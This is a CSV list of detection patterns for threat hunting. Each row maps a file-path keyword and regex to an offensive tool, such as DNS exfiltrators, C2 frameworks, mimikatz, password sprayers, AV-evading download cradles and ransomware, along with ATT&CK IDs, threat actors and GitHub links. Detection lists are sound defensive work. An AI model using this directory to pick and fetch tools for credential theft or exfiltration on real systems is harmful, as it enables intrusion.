"*\dns-dump.ps1*",".{0,1000}\\dns\-dump\.ps1.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","15001"
"*\dnsdump.py*",".{0,1000}\\dnsdump\.py.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","0","N/A","N/A","N/A","10","997","118","2025-04-04T09:28:20Z","2019-04-24T17:18:46Z","15002"
"*\dnsExfiltrator.cs*",".{0,1000}\\dnsExfiltrator\.cs.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","0","N/A","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","15003"
"*\dnsExfiltrator.dll*",".{0,1000}\\dnsExfiltrator\.dll.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","0","N/A","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","15004"
"*\dnsexfiltrator.py*",".{0,1000}\\dnsexfiltrator\.py.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","0","N/A","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","15005"
"*\dnskire.js*",".{0,1000}\\dnskire\.js.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","15006"
"*\DnSpoof.ps1*",".{0,1000}\\DnSpoof\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15007"
"*\dnsrecon.py*",".{0,1000}\\dnsrecon\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","15008"
"*\dnsrecon-subdomain-bruteforce.py*",".{0,1000}\\dnsrecon\-subdomain\-bruteforce\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","15009"
"*\dnsstager.py*",".{0,1000}\\dnsstager\.py.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","Black Basta","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","15010"
"*\DNS-TXT-Pwnage.ps1*",".{0,1000}\\DNS\-TXT\-Pwnage\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","15011"
"*\dns-zone-transfer.py*",".{0,1000}\\dns\-zone\-transfer\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","15012"
"*\DocsPLZ.cpp*",".{0,1000}\\DocsPLZ\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","15014"
"*\DocsPLZ.exe*",".{0,1000}\\DocsPLZ\.exe.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","15015"
"*\Documents\*.dedsec*",".{0,1000}\\Documents\\.{0,1000}\.dedsec.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","0","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","15016"
"*\Documents\Crypttest\*",".{0,1000}\\Documents\\Crypttest\\.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","15018"
"*\Do-Exfiltration.ps1*",".{0,1000}\\Do\-Exfiltration\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","15019"
"*\Do-Exfiltration.ps1*",".{0,1000}\\Do\-Exfiltration\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","15020"
"*\Do-Exfiltration.ps1*",".{0,1000}\\Do\-Exfiltration\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","15021"
"*\DoHC2.cs*",".{0,1000}\\DoHC2\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","15022"
"*\domain_admins.txt*",".{0,1000}\\domain_admins\.txt.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","15023"
"*\DomainGPPPassword.cs*",".{0,1000}\\DomainGPPPassword\.cs.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","15024"
"*\DomainPasswordSpray\*",".{0,1000}\\DomainPasswordSpray\\.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","15025"
"*\DomainPasswordSpray-master*",".{0,1000}\\DomainPasswordSpray\-master.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","15026"
"*\DomainRecon\*.txt",".{0,1000}\\DomainRecon\\.{0,1000}\.txt","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","15027"
"*\DomainTrustRecon.ahk*",".{0,1000}\\DomainTrustRecon\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","15028"
"*\domcachedump.py*",".{0,1000}\\domcachedump\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","15029"
"*\domcachedump.py*",".{0,1000}\\domcachedump\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","15030"
"*\domcachedump.py*",".{0,1000}\\domcachedump\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","15031"
"*\Dont Press.exe*",".{0,1000}\\Dont\sPress\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15032"
"*\donut.exe*",".{0,1000}\\donut\.exe.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","15033"
"*\donut\VanillaProgram.bin*",".{0,1000}\\donut\\VanillaProgram\.bin.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","N/A","10","3","213","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z","15034"
"*\donut-packer.py*",".{0,1000}\\donut\-packer\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","15035"
"*\doppelpaymer1.txt*",".{0,1000}\\doppelpaymer1\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15036"
"*\doppelpaymer2.txt*",".{0,1000}\\doppelpaymer2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15037"
"*\doppelpaymer3.txt*",".{0,1000}\\doppelpaymer3\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15038"
"*\doppelpaymer4.txt*",".{0,1000}\\doppelpaymer4\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15039"
"*\Doraemon*",".{0,1000}\\Doraemon.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","15040"
"*\DosDevices\mimidrv*",".{0,1000}\\DosDevices\\mimidrv.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","15041"
"*\DoubleDrive-main.zip*",".{0,1000}\\DoubleDrive\-main\.zip.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","15042"
"*\doucme.csproj*",".{0,1000}\\doucme\.csproj.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z","15043"
"*\doucme.exe*",".{0,1000}\\doucme\.exe.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z","15044"
"*\doucme.sln*",".{0,1000}\\doucme\.sln.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z","15045"
"*\Download:Cradle.js*",".{0,1000}\\Download\:Cradle\.js.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","15046"
"*\Download_Cradles.hta*",".{0,1000}\\Download_Cradles\.hta.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","15048"
"*\Download_Cradles.ps1*",".{0,1000}\\Download_Cradles\.ps1.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","15049"
"*\Download_Execute.ps1*",".{0,1000}\\Download_Execute\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","15050"
"*\Download_Execute_PS.ps1*",".{0,1000}\\Download_Execute_PS\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","15051"
"*\download_filehttp.py*",".{0,1000}\\download_filehttp\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15052"
"*\download_filehttp.txt*",".{0,1000}\\download_filehttp\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15053"
"*\Download-Cradles.cmd*",".{0,1000}\\Download\-Cradles\.cmd.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","15054"
"*\downloadexec.lua*",".{0,1000}\\downloadexec\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","15055"
"*\Download-Execute-PS.ps1*",".{0,1000}\\Download\-Execute\-PS\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","15056"
"*\Dpapi.ps1*",".{0,1000}\\Dpapi\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","15058"
